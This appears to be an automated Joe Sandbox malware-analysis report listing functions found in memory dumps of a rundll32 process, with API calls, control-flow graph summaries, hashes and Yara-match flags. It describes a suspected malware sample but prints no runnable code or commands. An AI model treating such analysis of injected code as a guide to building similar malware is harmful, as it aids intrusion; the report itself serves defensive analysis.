                                                                                                                              • Opcode ID: e57ba96850fc4ed672a04358294dd965eebdd847be518c4c813339f9ff47fae7
                                                                                                                              • Instruction ID: e69198a839868f3aec8e0c710b3fbf34ab9b74801cbdb07016807b99e54eb4e8
                                                                                                                              • Opcode Fuzzy Hash: e57ba96850fc4ed672a04358294dd965eebdd847be518c4c813339f9ff47fae7
                                                                                                                              • Instruction Fuzzy Hash: E7F08CB6110149ABCB14DF98DC85CE777ACFF88214B148649FD5D97202C234E815CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 3709c02649e64d94d6b6a3c1aa228a2a6b3fea531bfb88ae086ee6e430fedb97
                                                                                                                              • Instruction ID: 619c8f98ded7a4ef5b32a8e17745d1a73bd87919fdebcb6bbc72a507c8d53a2f
                                                                                                                              • Opcode Fuzzy Hash: 3709c02649e64d94d6b6a3c1aa228a2a6b3fea531bfb88ae086ee6e430fedb97
                                                                                                                              • Instruction Fuzzy Hash: C190022921310003F6807558550868A000987D1246F91D819A1816758CD925D8A96361
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: d5b249f0c1e0d8f51cc98ccd66ee6e4ccc7e0a7f0ef39836977f419962000fb2
                                                                                                                              • Instruction ID: f2ef231d6614a87fa38cde4931cd173bb238e757a55cda3949d285da94e38c32
                                                                                                                              • Opcode Fuzzy Hash: d5b249f0c1e0d8f51cc98ccd66ee6e4ccc7e0a7f0ef39836977f419962000fb2
                                                                                                                              • Instruction Fuzzy Hash: A5900221242141537A45B5584504587400A97E0285791C416A2C15B50CD536E896E761
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 3f79ec2b52af71cbe7e464d040684fb8005f0e3fd63c0dab414a7ea2a1021900
                                                                                                                              • Instruction ID: d10698d8e603e9582208dd04ac8dc6d066e2b1e2713b21e453cfbaa0bad97845
                                                                                                                              • Opcode Fuzzy Hash: 3f79ec2b52af71cbe7e464d040684fb8005f0e3fd63c0dab414a7ea2a1021900
                                                                                                                              • Instruction Fuzzy Hash: 3290023120110413F61175584604787000D87D0285F91C816A1C25758DE666D992B261
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 628f86091c814fc70a34b8f0a3d8e95713ae76d1d2eda94162518678dd815897
                                                                                                                              • Instruction ID: c64f4a8018ba92bf5023f0d3d48be9ca1bed4976f434b9c6861ddb71bdef6853
                                                                                                                              • Opcode Fuzzy Hash: 628f86091c814fc70a34b8f0a3d8e95713ae76d1d2eda94162518678dd815897
                                                                                                                              • Instruction Fuzzy Hash: F490027120110403F640755845047C6000987D0345F51C415A6865754ED669DDD577A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 7d19e2f1188f49764cfb44e037543ed2940b14ff50b27ca7a83e272588d0a9fa
                                                                                                                              • Instruction ID: b7dc74ae585f748f9879b15b9d9eba3c7f344dd2ba079712861463ab1a2c9bb4
                                                                                                                              • Opcode Fuzzy Hash: 7d19e2f1188f49764cfb44e037543ed2940b14ff50b27ca7a83e272588d0a9fa
                                                                                                                              • Instruction Fuzzy Hash: F590026134110443F60075584514B860009C7E1345F51C419E2865754DD629DC927266
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 19e88f72d0093099629852b00966e5613216d0cfbdbf0c6add16d7314d1f3725
                                                                                                                              • Instruction ID: b3206f42a1f0b9ac5afb2109765d9bbe489233dfe2055a913a0f0d2685de4f38
                                                                                                                              • Opcode Fuzzy Hash: 19e88f72d0093099629852b00966e5613216d0cfbdbf0c6add16d7314d1f3725
                                                                                                                              • Instruction Fuzzy Hash: D890022121190043F70079684D14B87000987D0347F51C519A1955754CD925D8A16661
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a0bcc5e2af5c359d766f436714cb8eb71af190ea22498c7a1d0f43c82f8f8617
                                                                                                                              • Instruction ID: f8a871bad566b86e770d2d33db7818d85f43e88236cc5565e0c78df397b1879b
                                                                                                                              • Opcode Fuzzy Hash: a0bcc5e2af5c359d766f436714cb8eb71af190ea22498c7a1d0f43c82f8f8617
                                                                                                                              • Instruction Fuzzy Hash: 2D900225211100032605B9580704587004A87D5395351C425F2816750CE631D8A16261
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 64df8e6e9181b7a5014381c43198de651f48896632477a55dfc1a51a12ef0cf9
                                                                                                                              • Instruction ID: cd0a6adaa652ec86bb2cf6776658d6bfaf93b3cb8ea318960035c2ebcd9bdb76
                                                                                                                              • Opcode Fuzzy Hash: 64df8e6e9181b7a5014381c43198de651f48896632477a55dfc1a51a12ef0cf9
                                                                                                                              • Instruction Fuzzy Hash: D390026120210003660575584514696400E87E0245B51C425E2815790DD535D8D17265
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8fc4f38f2c3d79b8404f3da46a70acc3e9f3d4d5ca9d6f83d5da077bbaa3421c
                                                                                                                              • Instruction ID: c1dd5f504897f0139a00d400c790492ffc37e7086bd487faf024f7b7badebc6c
                                                                                                                              • Opcode Fuzzy Hash: 8fc4f38f2c3d79b8404f3da46a70acc3e9f3d4d5ca9d6f83d5da077bbaa3421c
                                                                                                                              • Instruction Fuzzy Hash: FF90023120514843F64075584504AC6001987D0349F51C415A1865794DE635DD95B7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6cafbff295ba7808f4cdb77323cebe230ddb5f7d077343cc30e7d07a76c92427
                                                                                                                              • Instruction ID: 2ba5265638fd920c84597fa4f3a2e20fc6d2a0001d370bcf8b656bd7074d28fc
                                                                                                                              • Opcode Fuzzy Hash: 6cafbff295ba7808f4cdb77323cebe230ddb5f7d077343cc30e7d07a76c92427
                                                                                                                              • Instruction Fuzzy Hash: 3490023120110803F680755845046CA000987D1345F91C419A1826754DDA25DA9977E1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: f461a69ade185a8cd2f721b42f732ca987c87230d571654f5675aac16c0c7e4f
                                                                                                                              • Instruction ID: 0e21106c54ec0e94b0fd50592fbde80e95a00fcecc3ef65d0f9c25f3c872e85c
                                                                                                                              • Opcode Fuzzy Hash: f461a69ade185a8cd2f721b42f732ca987c87230d571654f5675aac16c0c7e4f
                                                                                                                              • Instruction Fuzzy Hash: D490023120110403F600799855086C6000987E0345F51D415A6825755ED675D8D17271
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: ef2afb3df8b64c09da9691dfed6de568b7579f1e559e9b42458a465e70ef77aa
                                                                                                                              • Instruction ID: 6010aa43d5d077ca1d7284eb20e97e0c8719c86caf1163a5a27933c13761a2eb
                                                                                                                              • Opcode Fuzzy Hash: ef2afb3df8b64c09da9691dfed6de568b7579f1e559e9b42458a465e70ef77aa
                                                                                                                              • Instruction Fuzzy Hash: B990023120110843F60075584504BC6000987E0345F51C41AA1925754DD625D8917661
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 2c1baf8f2eccc5a653be86582667b84d3135dcbaf8ad9c5cfb885be17d9064f1
                                                                                                                              • Instruction ID: 6e6147cb203a2f89ba510f0ffc592ae775892ad6d3ca79e51e7c19d69ef8778b
                                                                                                                              • Opcode Fuzzy Hash: 2c1baf8f2eccc5a653be86582667b84d3135dcbaf8ad9c5cfb885be17d9064f1
                                                                                                                              • Instruction Fuzzy Hash: 4290023120118803F610755885047CA000987D0345F55C815A5C25758DD6A5D8D17261
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: ca8320fc9b80604536e699d82425f791c5d530cdad4e3028404001cf8ecca78d
                                                                                                                              • Instruction ID: a9c0b7ed55abd59c92dd51932bbd24f72a51ec0f617c1016dc63e4cd2ee33967
                                                                                                                              • Opcode Fuzzy Hash: ca8320fc9b80604536e699d82425f791c5d530cdad4e3028404001cf8ecca78d
                                                                                                                              • Instruction Fuzzy Hash: B490023160520403F60075584614786100987D0245F61C815A1C25768DD7A5D99176E2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00549070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 353 549070-5490b2 call 54bd30 356 54918c-549192 353->356 357 5490b8-549108 call 54be00 call 53ace0 call 544e40 353->357 364 549110-549121 Sleep 357->364 365 549186-54918a 364->365 366 549123-549129 364->366 365->356 365->364 367 549153-549174 call 548ea0 366->367 368 54912b-549151 call 548c90 366->368 372 549179-54917c 367->372 368->372 372->365
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00549118
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: 650076273e4967152e7793a7eb55c0cc7adeee1fc35afc465c3c56050ace6099
                                                                                                                              • Instruction ID: e8616d891c66fd2f1f1be5a4c0cc4784e85357988b146ef211e15ee9e741a2c5
                                                                                                                              • Opcode Fuzzy Hash: 650076273e4967152e7793a7eb55c0cc7adeee1fc35afc465c3c56050ace6099
                                                                                                                              • Instruction Fuzzy Hash: 813184B6900746BBC724DF64CC8AFA7BBB8BB88704F10851DF62A5B245D630B550CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00549066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 373 549066-5490b2 call 54bd30 377 54918c-549192 373->377 378 5490b8-549108 call 54be00 call 53ace0 call 544e40 373->378 385 549110-549121 Sleep 378->385 386 549186-54918a 385->386 387 549123-549129 385->387 386->377 386->385 388 549153-549174 call 548ea0 387->388 389 54912b-549151 call 548c90 387->389 393 549179-54917c 388->393 389->393 393->386
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00549118
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: b2d2bfb46a4a43ff9b5ed750c5b33ef0e52bb89590ad8a7567e87de4125cf1c8
                                                                                                                              • Instruction ID: a896ecbe6ee0abad3152c087488091cced724a65112adea0f87d5ca29a4aa100
                                                                                                                              • Opcode Fuzzy Hash: b2d2bfb46a4a43ff9b5ed750c5b33ef0e52bb89590ad8a7567e87de4125cf1c8
                                                                                                                              • Instruction Fuzzy Hash: 8221B4B1900306BBC714DF64C88AFA7BBB8FB88704F10845DF62D5B246D770A550CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 406 54a660-54a691 call 54af50 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00533AF8), ref: 0054A68D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: .z`
                                                                                                                              • API String ID: 3298025750-1441809116
                                                                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                              • Instruction ID: 368df9138d2baaf86d922c319ea906d048ca3db412369af86ca70f5b145f9557
                                                                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                              • Instruction Fuzzy Hash: D9E012B5200208ABDB18EF99CC89EA777ACAF88754F018558BE1C5B242C630E9148AB0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 403 54a620-54a636 404 54a63c-54a651 RtlAllocateHeap 403->404 405 54a637 call 54af50 403->405 405->404
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(&ET,?,00544C9F,00544C9F,?,00544526,?,?,?,?,?,00000000,00000000,?), ref: 0054A64D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: &ET
                                                                                                                              • API String ID: 1279760036-579456493
                                                                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                              • Instruction ID: ba28c88ee1718e62667e6059a9051b3564b883398441f55ec7dca16729a7e675
                                                                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                              • Instruction Fuzzy Hash: 89E012B5200208ABDB14EF99CC85EA777ACAF88654F118558BE1C5B242C630F9148AB0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A655 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 409 54a655-54a656 410 54a628-54a637 call 54af50 409->410 411 54a658-54a65a 409->411 413 54a63c-54a651 RtlAllocateHeap 410->413
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(&ET,?,00544C9F,00544C9F,?,00544526,?,?,?,?,?,00000000,00000000,?), ref: 0054A64D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: &ET
                                                                                                                              • API String ID: 1279760036-579456493
                                                                                                                              • Opcode ID: 9561686de1316977a3ce7faae3b09351b89e4e7b19a4149025285c9b754f8550
                                                                                                                              • Instruction ID: 8d8875e42230d778204265e4ac1738a90691e387967429da61bf39fbf3febc48
                                                                                                                              • Opcode Fuzzy Hash: 9561686de1316977a3ce7faae3b09351b89e4e7b19a4149025285c9b754f8550
                                                                                                                              • Instruction Fuzzy Hash: 76E0DFBA1093806FD700EE30AC80887BB91AE81208725444DF89883643C221D40996A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00538308 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 420 538308-53831f 421 538328-53835a call 54c9f0 call 53ace0 call 544e40 420->421 422 538323 call 54be50 420->422 429 53838e-538392 421->429 430 53835c-53836e PostThreadMessageW 421->430 422->421 431 538370-53838b call 53a470 PostThreadMessageW 430->431 432 53838d 430->432 431->432 432->429
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0053836A
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0053838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
